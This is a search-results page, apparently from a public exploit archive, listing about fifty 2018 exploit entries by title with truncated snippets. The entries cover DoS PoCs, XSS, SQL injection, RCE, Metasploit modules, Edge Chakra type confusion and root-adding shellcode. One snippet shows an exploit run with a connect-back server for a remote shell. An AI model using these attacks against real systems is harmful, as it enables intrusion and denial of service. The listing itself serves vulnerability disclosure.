47904 matches found
Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)
Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery Delete Post Date: 2018-08-21 Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 Description : An issue was discovered in Twitter-Clone 1 which allows a remote attacker ...
SEIG Modbus 3.4 - Denial of Service (PoC)
Title: SEIG Modbus 3.4 - Denial of Service PoC Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4 Version: v3.4...
Restorator 1793 - Denial of Service (PoC)
Exploit Title: Restorator 1793 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-19 Homepage: https://www.bome.com/ Software Link: https://www.bome.com/bome/downloads/Restorator2018Full1793.exe Tested Version: v1793 Tested on OS: Windows 7 x64 Steps to Reproduce: Run t...
Prime95 29.4b7 - Denial Of Service (PoC)
Exploit Title: Prime95 29.4b7 - Denial Of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-20 Homepage: http://www.mersenne.org Software Link: http://www.mersenne.org/ftproot/gimps/p95v294b7.win32.zip Tested Version: 29.4b7 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run t...
Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)
Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-19 Homepage: https://www.zortam.com Software Link: https://www.zortam.com/download.html Tested Version: 23.95 Tested on OS: Windows 7 x64 Steps to Reproduce: Run the python...
WordPress Plugin Tagregator 0.6 - Cross-Site Scripting
Exploit Title: WordPress Plugin Tagregator 0.6 - Cross-Site Scripting Date: 2018-05-05 Exploit Author: ManhNho Vendor Homepage: https://wordpress.org/plugins/tagregator/ Software Link: https://downloads.wordpress.org/plugin/tagregator.0.6.zip Ref: https://pastebin.com/ZGr5tyP2 Version: 0.6 Tested...
Countly - Cross-Site Scripting
Exploit Title: Countly-server StoredPersistent XSS Vulnerability Date: Monday - 2018 13 August Author: 10:10AM Team Discovered By: Sleepy Software Link: https://github.com/Countly/countly-server Version: All Version Category: Web-apps Security Risk: Critical Tested on: GNU/Linux Ubuntu 16.04 - wi...
Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution
!/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337 Easylogin Pro = v1.3.0...
WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection
Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection Exploit Author: Çlirim Emini Website: https://www.sentry.co.com Software Link: https://wordpress.org/plugins/chained-quiz/ Version/s: 1.0.8 and below Patched Version: 1.0.9 CVE : N/A WPVULNDB:...
SEIG Modbus 3.4 - Remote Code Execution
Title: SEIG Modbus 3.4 - Remote Code Execution Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4 Version: v3.4...
MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery
Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery Date: 2018-05-17 Author: 0xB9 Twitter: @0xB9Sec Software Link: https://community.mybb.com/mods.php?action=view&pid=1105 Version: 1.1 Tested on: Ubuntu 18.04 1. Description: The plugin allows moderators to save notes a...
SEIG SCADA System 9 - Remote Code Execution
Title: SEIG SCADA SYSTEM 9 - Remote Code Execution Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link: https://www.schneider-electric.ie/en/download/document/V9Fullinstallationpackageregisterandreceivefile/ Version: v9 Tested on: Windows7 x...
Microsoft Edge Chakra JIT - Parameter Scope Parsing Type Confusion
// PoC: async function triggera = class b await 1 let spray = ; for let i = 0; i 0016 SetHomeObj R13 R14 001b NewScObjectSimple R9 001d ProfiledStFld R9.value = R2 1 0021 ProfiledStFld R9.done = R4 2 0025 Yield R9 R9 ----------------------------------------------- 0028 ResumeYield R15 R9 002b...
CEWE Photoshow 6.3.4 - Denial of Service (PoC)
Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-17 Homepage: https://cewe-photoworld.com/ Software Link: https://cewe-photoworld.com/creator-software/windows-download Tested Version: 6.3.4 Tested on OS: Windows 10 Steps to Reproduc...
Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion
/ This is similar to issue 1531 . The patch seems to prevent type confusion triggered from StElemIA instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type confusion with the push method in the same way used for...
Mikrotik WinBox 6.42 - Credential Disclosure (golang)
/ Title: Mikrotik WinBox 6.42 - Credential Disclosure golang edition Author: Maxim Yefimenko @slider Date: 2018-08-06 Sotware Link: https://mikrotik.com/download Vendor Page: https://www.mikrotik.com/ Version: 6.29 - 6.42 Tested on: Fedora 28 \ Debian 9 \ Windows 10 \ Android wherever it was...
ADM 3.1.2RHG1 - Remote Code Execution
Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution Author: Matthew Fulton & Kyle Lovett Date: 2018-07-01 Vendor Homepage: https://www.asustor.com/ Software Link: http://download.asustor.com/download/adm/X64G33.1.2.RHG1.img Version: = ADM 3.1.2RHG1 Tested on: ASUSTOR AS6202T CVE : CVE-2018-11510...
Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion
/ The InitializeNumberFormat function in Intl.js is used to initialize an Intl.NumberFormat object, and InitializeDateTimeFormat is used for an Intl.DateTimeFormat object. There are two versions of each initializer. One is for WinGlob and the other is for ICU. The problem is that the versions for...
Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion
/ Here's the method. template template void DictionaryPropertyDescriptor::CopyFromDictionaryPropertyDescriptor& descriptor this-Attributes = descriptor.Attributes; this-Data = descriptor.Data == DictionaryPropertyDescriptor::NoSlots ? NoSlots : descriptor.Data; this-Getter = descriptor.Getter ==...
Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl
/ If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag. In the PoC, it redefines Map.prototype.get to intercept the execution of...
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)
!/usr/bin/env python Copyright c 2018 Matthew Daley Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files the "Software", to deal in the Software without restriction, including without limitation the rights to use, copy,...
WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)
Exploit Title: WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData' Buffer Overflow PoC Date: 2018-08-15 Exploit Author: PeregrineX Vendor Homepage: https://webkitgtk.org/ & https://webkit.org/wpe/ Software Link: https://webkitgtk.org/releases/ & https://wpewebkit.org/releases/ Version: RefPtr...
ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)
Exploit Title: ObserverIP Scan Tool 1.4.0.1 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-16 Homepage: https://www.ambientweather.com Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/iptools/IPTools64bit.exe Tested Version: 1.4.0....
WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection
Exploit Title: Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection Exploit Author: Javier Olmedo Website: https://hackpuntes.com Date: 2018-08-14 Google Dork: N/A Vendor: Matt Cromwell Software Link: https://wordpress.org/plugins/export-users-to-csv/ Affected Version: 1.1.1 and before Acti...
TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)
Exploit Title: TP-Link WR840N 0.9.1 3.16 - Denial of Service PoC Exploit Author: Aniket Dinda Date: 2018-08-05 Vendor Homepage: https://www.tp-link.com/ Hardware Link: https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q Version: TP-Link Wireless N Router WR840N Firmwar...
OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions
Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions Date: 2018-08-14 Exploit Author: Joshua Fam Twitter : @Insecurity Vendor Homepage: https://www.open-emr.org/ Software Link: https://github.com/openemr/openemr/archive/v5013.tar.gz Version: 5.0.1.3 Tested on: Ubuntu LAMP, OpenEMR Version...
Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: SQL Injection, XSS & CSRF vulnerabilities product: Pimcore vulnerable version: 5.2.3 and below fixed version: 5.3.0 CVE number: CVE-2018-14057, CVE-2018-14058,...
Central Management Software 1.4.13 - Denial of Service (PoC)
Exploit Title: Central Management Software v1.4.13 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-16 Homepage: https://www.ambientweather.com Software Link:...
ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass
Title: ASUS-DSL N10 1.1.2.217 - Authentication Bypass Author: AmnBAN team Date: 2018-08-06 Vendor Homepage: https://www.asus.com/Networking/DSLN10C1with5dBiantenna/ Sofrware version: 1.1.2.217 CVE: N/A 1. Description: In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.217 there is loginauthorization...
ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection
Product - ASUSTOR ADM - 3.1.0.RFQ3 and all previous builds Vendor - https://www.asustor.com/ Patch Notes - http://download.asustor.com/download/docs/releasenotes/RNADM3.1.3.RHU2.pdf Issue: The Asustor NAS appliance on ADM 3.1.0 and before suffer from multiple critical vulnerabilities. The...
JioFi 4G M2S 1.0.2 - Denial of Service (PoC)
Exploit Title: JioFi 4G M2S 1.0.2 - Denial of Service PoC Exploit Author: Vikas Chaudhary Date: 2018-07-26 Vendor Homepage: https://www.jio.com/ Hardware Link:...
Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)
Exploit title: Oracle Glassfish OSE 4.1 - Path Traversal Metasploit Author: Dhiraj Mishra Date: 2018-08-14 Software: Oracle Glassfish Server OSE Version: 4.1 Software link: http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip CVE: 2017-1000028 This module requires Metasploit:...
Wansview 1.0.2 - Denial of Service (PoC)
Exploit Title: Wansview 1.0.2 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-14 Software Link: http://www.wansview.com/uploads/soft/Wansviewv1.0.2.exe Tested Version: 1.0.2 Tested on OS: Windows 10 Steps to Reproduce: Run the python exploit script, it will create a...
Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Path Traversal in Oracle GlassFish Server Open Source Edition', 'Description' = %q This module exploits an unauthenticated directory traversal...
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
Exploit Title: Cloudme 1.9 - Buffer Overflow DEP Metasploit Date: 2018-08-13 Exploit Author: Raymond Wellnitz Vendor Homepage: https://www.cloudme.com Version: 1.8.x/1.9.x Tested on: Windows 7 x64 CVE : 2018-6892 This module requires Metasploit: https://metasploit.com/download Current source:...
cgit 1.2.1 - Directory Traversal (Metasploit)
Title: cgit 1.2.1 - Directory Traversal Metasploit Author: Dhiraj Mishra Software: cgit Link: https://git.zx2c4.com/cgit/ Date: 2018-08-14 CVE: CVE-2018-14912 This module exploits a directory traversal vulnerability which exists in cgit 'cgit Directory Traversal', 'Description' = %q This module...
Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)
Linux/x64 - Add Root User toor/toor Shellcode 99 bytes. Shellcode exploit for Linuxx86-64 platform ; Title: add root user toor:toor ; Date: 20180811 ; Author: epi ; https://epi052.gitlab.io/notes-to-self/ ; Tested on: linux/x8664 SMP CentOS-7 3.10.0-862.2.3.el7.x8664 GNU/Linux ; ; Shellcode Lengt...
Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)
Exploit Title: Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service PoC Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovey Date: 2018-08-13 Vendor Homepage: https://switchportmapper.com/ Software Link: https://switchportmapper.com/download/spm2812.zip...
Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/powershell' class MetasploitModule 'Oracle Weblogic Server Deserialization RCE', 'Description' = %q An unauthenticated attacker with network...
IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting
Exploit Title: IBM Sterling B2B Integrator persistent cross-site scripting Exploit Author: Vikas Khanna https://www.linkedin.com/in/leetvikaskhanna/ https://twitter.com/MRSHANUKHANNA Vendor Homepage:...
PostgreSQL 9.4-0.5.3 - Privilege Escalation
Exploit Title: PostgreSQL 9.4-0.5.3 - Privilege Escalation Date: 2017-10-11 Exploit Author: Johannes Segitz Vendor Homepage: https://bugzilla.suse.com/showbug.cgi?id=1062722 Software Link: - Version: Before postgresql-init-9.4-0.5.3.1 Tested on: SUSE Linux Enterprise 11 SP4 CVE : CVE-2017-14798...
Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow
Exploit Title: iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow Author: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovey Date: 2018-08-12 Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5 Tested...
Android - Directory Traversal over USB via Injection in blkid Output
When a USB mass storage device is inserted into an Android phone even if the phone is locked!, vold will attempt to automatically mount partitions from the inserted device. For this purpose, vold has to identify the partitions on the connected device and collect some information about them, which...
PLC Wireless Router GPN2.4P21-C-CN - Denial of Service
Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Unauthenticated Remote Reboot Date: 8/12/2018 Exploit Author: Chris Rose Affected Model : GPN2.4P21-C-CNFirmware: W2001EN-00 Vendor: ChinaMobile Tested on: Debian Linux Shodan dork- title:PLC CVE: None Description: PLC Wireless Router's are...
Acunetix WVS 10.0 Build 20150623 - Denial of Service (PoC)
Exploit Title : Acunetix Web Vulnerability Scanner 10.0 Build 20150623 - Denial of Service PoC Discovery by: Javier Enrique Rodriguez Gutierrez Discovery Date : 2018-08-11 Vendor Homepage: https://www.acunetix.com Tested Version : 10.0 Vulnerability Type : Denial of Service PoC Tested on OS :...
Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DIRECTX-SDK-XACT.EXE-TROJAN-FILE-CODE-EXECUTION.txt + ISR: Apparition Security Greetz: indoushka | Eduardo Vendor ============= www.microsoft.com Product ===========...
IP Finder 1.5 - Denial of Service (PoC)
Exploit Title: IP Finder 1.5 - Denial of Service PoC Author: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovey Date: 2018-08-12 Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/429-ip-finder Tested Version: 1.5 Tested on OS: Windows XP...
MyBB Like Plugin 3.0.0 - Cross-Site Scripting
Exploit Title: MyBB Like Plugin 3.0.0 - Cross-Site Scripting Date: 2018-08-01 Author: 0xB9 Twitter: @0xB9Sec Software Link: https://community.mybb.com/mods.php?action=view&pid=360 Version: 3.0.0 Tested on: Ubuntu 18.04 CVE: N/A 1. Description: This plugin allows users to thank/like other users...
iSmartViewPro 1.5 - 'Password' Buffer Overflow
Exploit Title: iSmartViewPro 1.5 - 'Password' Buffer Overflow Discovery by: Javier Enrique Rodriguez Gutierrez Discovery Date: 2018-08-09 Vendor Homepage: https://securimport.com/ Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5 Tested...
MyBB Thank You/Like Plugin 3.0.0 - Cross-Site Scripting
Exploit Title: MyBB Thank You/Like Plugin 3.0.0 - Cross-Site Scripting Date: 8/1/2018 Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://community.mybb.com/mods.php?action=view&pid=360 Version: 3.0.0 Tested on: Ubuntu 18.04 CVE: CVE-2018-14888 1. Description: This plugin...